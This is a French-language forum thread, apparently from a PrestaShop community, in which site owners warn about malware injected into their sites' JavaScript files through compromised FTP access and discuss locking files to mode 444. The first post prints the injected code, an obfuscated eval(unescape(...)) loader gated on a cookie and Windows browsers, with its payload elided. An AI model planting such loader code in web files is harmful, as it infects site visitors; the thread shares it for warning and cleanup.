ALERTE virus sur fichiers .js

[création de sites & seo]

Bonsoir,

Attention il court actuellement un virus qui se greffe sur les fichiers .js du répertoire js de votre site prestashop.

Dernier exemple sur 2 de nos sites sur le fichier tools.php

Ecriture de ce code en haut de page.

************** code malveillant *******************
eval(unescape("f%......................d"));
if(!getCookie('googlecounter'))
{
   expires = new Date();
   expires.setTime(expires.getTime() + 86400);
   setCookie('googlecounter', '1049', expires);
   if(navigator.appVersion.indexOf('Win')!=-1)
   {
       [removed](unescape("<%.................."));
   }
}
*************************************
--------------------------------- Code suivant ok -------------------------------
function    autoUrl(name, dest)
{
   var loc;
   var id_list;

   id_list = document.getElementById(name);
   loc = id_list.options[id_list.selectedIndex].value;
   if (loc != 0)
       location.href = dest+loc;
   return ;
}

Alors attention verrouiller vos fichiers js en lecture seul (444)

Cordialement

Phil

[jeckyl]

Salut,

as tu la moindre idée de comment ces fichiers ont pu être modifié ?

[création de sites & seo]

re

si seulement !!

nos fichiers source sont ok
mais les fichiers sur le ftp étais infectés ?
logi ftp flashxp

[phil46]

Re,

Est que tu es en ssl sur flashxp ?

si on vérouille le fichier JS en 444 alors il y a plus rien qui marche (editeur, jquery etc...)

Est ce que quelqu'un peut renseigner si le fichier JS est pas plus protégé que çà c'est grave quand même .......


A+

phil Did

[kevin78]

Salut

 

j'ai actuellement ce virus...

Je me suis connecté sur filezilla, d'un hôtel, peut être, et sûrement dû à ça

Du coup, fichier htaccess modifié par un tiers, et tous les fichiers js infectés....

Heureusement que j'ai une sauvegarde, je vais m'en occuper

 

Mais pour éviter ce hack une seconde fois, le fait de mettre en 444 règle tout ?!